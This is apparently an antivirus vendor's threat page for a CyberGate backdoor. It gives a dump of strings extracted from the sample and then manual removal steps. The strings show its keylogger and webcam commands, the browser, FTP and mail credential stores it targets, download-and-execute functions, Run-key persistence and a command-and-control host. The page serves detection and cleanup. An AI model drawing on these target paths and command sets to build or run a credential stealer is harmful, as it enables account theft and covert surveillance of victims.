csWindows31J
PTCP154
csPTCP154
windows-1250
windows-1251
windows-1252
windows-1253
windows-1254
windows-1255
windows-1256
windows-1257
windows-1258
HTTP-EQUIV
()<>@,;:\"./
()<>@,;:\"/[]?=
()<>@,;:\"/[]?={}
Z:\Projects\CyberGate Excel\Workplace\beta 2.5.2.0\Server\Indy10\Core\IdThread.pas
Z:\Projects\CyberGate Excel\Workplace\beta 2.5.2.0\Server\Indy10\Core\IdScheduler.pas
Z:\Projects\CyberGate Excel\Workplace\beta 2.5.2.0\Server\Indy10\Core\IdServerIOHandlerSocket.pas
EIdTCPNoOnExecute
TIdTCPServer
TIdTCPServerX
IdTCPServer
OnExecute
Z:\Projects\CyberGate Excel\Workplace\beta 2.5.2.0\Server\Indy10\Core\IdSchedulerOfThread.pas
%s User
IdCustomTCPServer
TIdCustomTCPServer
DefaultPort
EIdTCPServerError
Z:\Projects\CyberGate Excel\Workplace\beta 2.5.2.0\Server\Indy10\Core\IdCustomTCPServer.pas
CmdDelimiter
Z:\Projects\CyberGate Excel\Workplace\beta 2.5.2.0\Server\Indy10\Core\IdCommandHandlers.pas
'TIdCmdTCPServerAfterCommandHandlerEvent
TIdCmdTCPServer
(TIdCmdTCPServerBeforeCommandHandlerEvent
IdCmdTCPServer
Displays commands that the servers supports.
TIdTCPStream
IdRead() method of TIdTCPStream class does not support seeking
TIdHTTPProxyTransferMode
TIdHTTPProxyServerContextt
TIdHTTPProxyServerContext$
TOnHTTPContextEvent
TIdHTTPProxyServerContext
TOnHTTPDocument
TIdHTTPProxyServer
OnHTTPBeforeCommand
OnHTTPResponse
OnHTTPDocument
HTTP/1.0
HTTP/1.0 200 Connection established
HNetCfg.FwMgr
HNetCfg.FwAuthorizedApplication
PSAPI.dll
TWebcamThread
Uh.Uk
789:;<&'()* ,-./12345
iphlpapi.dll
AllocateAndGetTcpExTableFromStack
AllocateAndGetUdpExTableFromStack
SetTcpEntry
GetExtendedTcpTable
GetExtendedUdpTable
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
TSendKey
sqlite3_bind_blob
sqlite3_bind_text
sqlite3_bind_double
sqlite3_bind_int
sqlite3_bind_int64
sqlite3_bind_null
sqlite3_bind_parameter_index
sqlite3_open
sqlite3_close
sqlite3_errmsg
sqlite3_free
sqlite3_prepare_v2
sqlite3_column_count
sqlite3_column_name
sqlite3_column_decltype
sqlite3_step
sqlite3_column_blob
sqlite3_column_bytes
sqlite3_column_double
sqlite3_column_text
sqlite3_column_type
sqlite3_column_int64
sqlite3_finalize
sqlite3_reset
ESQLiteException
TSQLiteDatabaseD
TSQLiteTable
Failed to open database "%s" : %s
Failed to open database "%s" : unknown error
Error executing SQL
Could not prepare SQL statement
Error executing SQL statement
SQLite is Busy
SOFTWARE\Mozilla\Mozilla Firefox
SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox
SOFTWARE\Mozilla\Mozilla Firefox\
SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\
1234567890.
mozsqlite3.dll
sqlite3.dll
mozcrt19.dll
msvcr100.dll
mozglue.dll
mozutils.dll
nspr4.dll
plc4.dll
plds4.dll
nssutil3.dll
nss3.dll
PK11_GetInternalKeySlot
\Mozilla\Firefox\profiles.ini
\Mozilla\Firefox\
signons.sqlite
SELECT * FROM moz_logins
encryptedPassword
Microsoft\Network\Connections\pbk\rasphone.pbk
rasapi32.dll
rnaph.dll
RAS Passwords
SOFTWARE\Microsoft\Windows\CurrentVersion
Ps_Passwords
advapi32.dll
WindowsLive:name=*
\Mozilla Firefox\
MSVCR100.dll
softokn3.dll
userenv.dll
profiles.ini
\signons3.txt
\signons2.txt
\signons1.txt
\signons.txt
ps_SafariPasswordRecovery
AVURLProtocol_Classic
\Apple Computer\Preferences\keychain.plist
\Apple\Apple Application Support\CFNetwork.dll
http://
ftp://
*ftp://
https://
Shell.Application
http://cyber-sec.org/email/asp/email.php?email=
TMemoryOperation
%sysdir%\
%serverpath%\
%sysdir%
%serverpath%
Proxy Bypass
ntdll.dll
TPasswordItem
TArrayPasswod
Crypt32.dll
shell32.dll
Advapi32.dll
SOFTWARE\MOZILLA\MOZILLA FIREFOX
SOFTWARE\MOZILLA\MOZILLA FIREFOX\version.dll\Main
select * from moz_logins
Firefox
SOFTWARE\MOZILLA\MOZILLA FIREFOX\
\Flock\Browser\profiles.ini
Flock-Firefox
\1-abc\personal calendar\sqlite3.dll
\clipdiary\sqlite3.dll
\conceptworld\recentx\sqlite3.dll
\darq software\transmute\sqlite3.dll
\delphish\sqlite3.dll
\ditto\sqlite3.dll
\du meter\sqlite3.dll
\fcleaner\sqlite3.dll
\file seeker\sqlite3.dll
\flashnote\sqlite3.dll
\flashpaste\sqlite3.dll
\gorecord\sqlite3.dll
\gorecord2\sqlite3.dll
\linkcollector portable\sqlite3.dll
\ma-config.com\sqlite3.dll
\macrovirus\sqlite3.dll
\msnsniffer2\sqlite3.dll
\notecable\sqlite3.dll
\nzbleecher\sqlite3.dll
\outlook express\sqlite3.dll
\page update watcher\sqlite3.dll
\pipi\sqlite3.dll
\qloud\sqlite3.dll
\qloud\winamp\sqlite3.dll
\qloud\windows media player\sqlite3.dll
\recordtheradio\sqlite3.dll
\rightload\sqlite3.dll
\smm\funny sms10\sqlite3.dll
\smm\simple mail 7\sqlite3.dll
\spiceworks\bin\sqlite3.dll
\spyware-secure\sqlite3.dll
\timelog\sqlite3.dll
\video2webcam\sqlite3.dll
\webmarkers\sqlite3.dll
\webmediaplayer\sqlite3.dll
\windows media player\plugins\qloud\sqlite3.dll
\Mozilla Firefox\sqlite3.dll
\VirusGuardPlus\sqlite3.dll
\Safari\sqlite3.dll
\AIMP2\sqlite3.dll
\Live-Player\sqlite3.dll
\TrustedProtection\sqlite3.dll
\PCTotalDefender\sqlite3.dll
\Common Files\eEye Digital Security\Application Bus\sqlite3.dll
Windows Live Messenger
DynDNS\Updater\config.dyndns
Password=
Software\DownloadManager\Passwords
Software\DownloadManager\Passwords\
EncPassword
YLoginWnd
FileZilla\recentservers.xml
FileZilla\sitemanager.xml
FileZilla\filezilla.xml
.purple\accounts.xml
abe2869f-9b47-4cd9-a358-c22904dba7f7
trillian.ini
accounts.ini
password
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Trillian
Trillian\trillian.exe
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
###@@@!!!
IMAP Password
IMAP Password:
POP3 Password
POP3 Password:
HNetCfg.NATUPnP
StaticPortMappingCollection
Uh%Fm
TCpuUsageU
##,##0.00
TNewFTPThreadU
TPasswordU
SHFileOperationW
.hd'n
.hd*n
%s %s
Windows NT %d.%d
%s %s Server
Unknown Platform ID (%d)
%d.%d
%s [Build: %d
- Service Pack: %s
KERNEL32.DLL
TIdTCPClientNewp
TIdTCPClientNew
1.2.3
deflate 1.2.3 Copyright 1995-2005 Jean-loup Gailly
inflate 1.2.3 Copyright 1995-2005 Mark Adler
?456789:;<=
!"#$%&'()* ,-./0123
com.apple.Safari
com.apple.Safari0123456789ABCDEF
333333333333333333
33333833
3333339
3333333333333338
:*"*"$3338
3333333
33333333
33333333333
3333333333338
33338?383
333333333333
:*3:"$3338
333333333333333
KWindows
IdStackWindows
Sr_StartWebcam
UrlMon
UnitWebcamAPI
IdTCPStream
 IdTCPServer
Sr_Windows
Cm_Keylogger
~Sr_Ports
}Unitsndkey32
Vps_FireFox3_5
SQLiteTable3
SQLite3
Ps_IEpasswords
ps_URLHistory
FPs_PasswordRecovery
Ps_OperaPasswords
Sr_MemoryEXE
Sr_MemoryExecuteFunctions
U_GrabFirefox10
YU_GrabFirefox8
6U_GrabFirefox
\U_GrabChrome
U_GrabFirefox15
U_Grabfirefox22
{IdCmdTCPClient
SetNamedPipeHandleState
GetWindowsDirectoryW
GetProcessHeap
GetCPInfo
CreatePipe
RegQueryInfoKeyA
RegOpenKeyExW
RegOpenKeyExA
RegOpenKeyW
RegOpenKeyA
RegFlushKey
RegEnumKeyExW
RegEnumKeyExA
RegDeleteKeyW
RegCreateKeyExW
RegCreateKeyExA
RegCreateKeyW
RegCloseKey
CryptImportKey
CryptSetKeyParam
CryptDestroyKey
SetViewportOrgEx
GdiplusShutdown
ShellExecuteW
FindExecutableW
SHDeleteKeyW
URLDownloadToFileW
keybd_event
VkKeyScanW
UnhookWindowsHookEx
SetWindowsHookExW
SetWindowsHookExA
SetKeyboardState
MsgWaitForMultipleObjects
MapVirtualKeyW
MapVirtualKeyA
LoadKeyboardLayoutA
GetKeyboardState
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyState
GetKeyNameTextA
ExitWindowsEx
EnumWindows
EnumThreadWindows
ActivateKeyboardLayout
GetKeyboardType
FtpPutFileW
FtpSetCurrentDirectoryW
InternetOpenUrlW
InternetOpenUrlA
HttpQueryInfoA
.idata
.rdata
P.reloc
P.rsrc
[E.MyFull
-!GA?EXE
LMsg
AVICAP32.DLL
crypt32.dll
gdi32.dll
gdiplus.dll
mpr.dll
msacm32.dll
powrprof.dll
pstorec.dll
URLMON.DLL
user32.dll
version.dll
wininet.dll
winmm.dll
wsock32.dll
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_CURRENT_CONFIG
Portugal
Turkey
WEBCAM
*<>#%"{}|\^[]`
uploadandexecute
uploadandexecuteyes|
uploadandexecuteno|
webcam|webcamstream|
webcam|webcamstop|
webcamstart
[Execute]
KeyDelBackspace
CyberGateKeylogger
software\microsoft\windows\currentversion\uninstall\
Invalid Key Name
Invalid KeyName
%Username%
%Country%
Úte%
FirstExecution
keylogger|keyloggeronlinekey|
keylogger|keyloggerativar|T|
keylogger|keyloggerativar|F|
webcamlist|
webcam
filemanager|fmsendftpyes|
filemanager|fmsendftpno|
FIREFOX2|
FIREFOX8|
FIREFOX10|
FIREFOX15|
FIREFOX22|
\Opera\Opera\wand.dat
OPERA|
\Google\Chrome\User Data\Default\Login Data
CHROME|
\Google\Chrome\User Data\Default\Web Data
getpasswords
downexec
openweb
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce\
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\
fmexecnormal
filemanager|fmexecnormal|
fmexechide
filemanager|fmexechide|
fmexecparam
filemanager|fmexecparam|F|
filemanager|fmexecparam|T|
fmsendftp
filemanager|fmsendftp|
listarportas
listarportas|listadeportasativas|
listarportasdns
listarportas|finalizarconexao|
finalizarprocessoportas
listarportas|finalizarprocessoportas|Y|
listarportas|finalizarprocessoportas|N|
tecaladoexecutar
webcamconfig
keylogger
keylogger|keyloggeronlinestart|
keylogger|keyloggeronlinestop|
keyloggerativar
keyloggerdesativar
keyloggerbaixar
keylogger|keyloggerbaixar|
keylogger|keyloggerbaixar|NOLOGS
keyloggerexcluir
keylogger|keyloggerexcluir|
keyloggeronlinestart
keyloggeronlinestop
chromepass
chromepass|
keysearch
keysearch|NO
keysearch|YES
sendkeyswindow
enviarlogskey
enviarlogskey|
rar.exe
rarreg.key
vs.vbs
bs.bat
memoryexecoperation
TeamViewer.exe
TeamViewer_Resource.dll
TV.dll
x.html
Windows 3.1
Windows 95 (Release 2)
Windows 95
Windows 98 SE
Windows 98
Windows ME
Windows 8
Windows 7
Windows Vista
Windows XP Professional x64
Windows XP Home
Windows XP Professional
Windows 2000 Professional
Windows 2008
Windows 2003 Server Datacenter
Windows 2003 Server Enterprise
Windows 2003 Server Web Edition
Windows 2003 Server
Windows Home Server
Windows 2003 Server (Release 2)
Windows 2000 Server Datacenter
Windows 2000 Server Enterprise
Windows 2000 Server Web Edition
Windows 2000 Server
Windows NT 4.0 Server Datacenter
Windows NT 4.0 Server Enterprise
Windows NT 4.0 Server Web Edition
Windows NT 4.0 Server
SelfDelete.bat
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\RunOnce
Software\Microsoft\Windows NT\CurrentVersion\Windows
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
explorer.exe
\Microsoft\Windows\
CYBERGATEPASS
lala25.no-ip.biz
C:\User
InstallDir.exe
ÞFAULTBROWSER%
2.5.2.0
ftp.ftpserver.com
ftpuser
ftppass
Then set URL here.
calc.exe
notepad.exe
lsass.exe
explorer.exe
svchost.exe
http://www.somehosting.com/tagger.php
::{21EC2020-3AEA-1069-A2DD-08002B30309D}\::{2227A280-3AEA-1069-A2DE-08002B30309D}
::{031E4825-7B94-4dc3-B131-E946B44C8DD5}\{491E922F-5643-4af4-A7EB-4E7A138D8174}
::{59031a4?id=%ID%&name=%Username% @ %PCName%&version=%Version%
[email protected]
No help keyword specified.
No help found for %s#No context-sensitive help installed$No topic-based help system installed
Alt  Clipboard does not support Icons/Menu '%s' is already being used by another form
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window
OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters
Unsupported clipboard format
Transparent proxy cannot bind. UDP Not supported by this proxy.$Buffer terminator must be specified.!Buffer start position is invalid.
Reply Code is not valid: %s
Reply Code already exists: %s Thread must be specified for the scheduler.!You must have an OnExecute event.
Command not supported.
Address type not supported."%d: Circular links are not allowed"Not enough data in buffer. (%d/%d)
File "%s" not found
Object type not supported.
%s is not a valid IPv6 address:The requested IPVersion / Address family is not supported.
Set Size Exceeded.)UDP is not support in this SOCKS version.
Request rejected or failed.5Request rejected because SOCKS server cannot connect.QRequest rejected because the client program and identd report different user-ids.
Stack already created.1Only one TIdAntiFreeze can exist per application.&Cannot change IPVersion when connected$Can not bind in port range (%d - %d)
Connection Closed Gracefully.;Could not bind socket. Address and port are already in use.
Invalid Port Range (%d - %d)
%s is not a valid service.
"Operation not supported on socket.
Protocol family not supported.0Address family not supported by protocol family.
Socket is not connected..Cannot send or receive after socket is closed.#Too many references, cannot splice.
Operation would block.
Operation now in progress.
Operation already in progress.
Socket operation on non-socket.
Protocol not supported.
Socket type not supported.
Invalid destination array"Character index out of bounds (%d)
Start index out of bounds (%d)
Invalid count (%d)
Invalid destination index (%d)
Invalid codepage (%d)-Error on call to Winsock2 library function %s&Error on loading Winsock2 library (%s)
Resolving hostname %s.
Connecting to %s.
Socket Error # %d
List capacity out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d) Out of memory while expanding memory stream
Error reading %s%s%s: %s
Failed to get data for '%s'
Resource %s not found
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
Property %s does not exist
Thread creation error: %s
Thread Error: %s (%d)
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s
Invalid stream format$''%s'' is not a valid component name
Invalid data type for '%s'
Ancestor for '%s' not found
Cannot assign a %s to a %s
Interface not supported
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
Invalid variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
External exception %x
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Operation aborted(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
!'%s' is not a valid integer value('%s' is not a valid floating point value
I/O error %d
Integer overflow Invalid floating point operation


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    879.exe:2224
    879.exe:2196
    %original file name%.exe:288
    %original file name%.exe:1872
    104.exe:1524
    104.exe:684
    104.exe:1956
    104.exe:556
    InstallDir.exe:2204
    InstallDir.exe:2160

  2. Delete the original Backdoor file.
  3. Delete or disinfect the following files created/modified by the Backdoor:

    %System%\d3d9caps.tmp (1324 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\imageio1022321711270344178.tmp (1916 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\104.exe (5442 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\Windows\YwRtlw\YwRtlw.nfo (3 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\Windows\YwRtlw\YwRtlw.svr (1646 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\InstallDir\InstallDir.exe (20436 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\Windows\YwRtlw\YwRtlw.dat (298 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\imageio2575838711905966772.tmp (1916 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\imageio5940846140248508825.tmp (1916 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\879.exe (5442 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "Addbgr" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\InstallDir\InstallDir.exe"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "Addbgr" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\InstallDir\InstallDir.exe"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2026 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now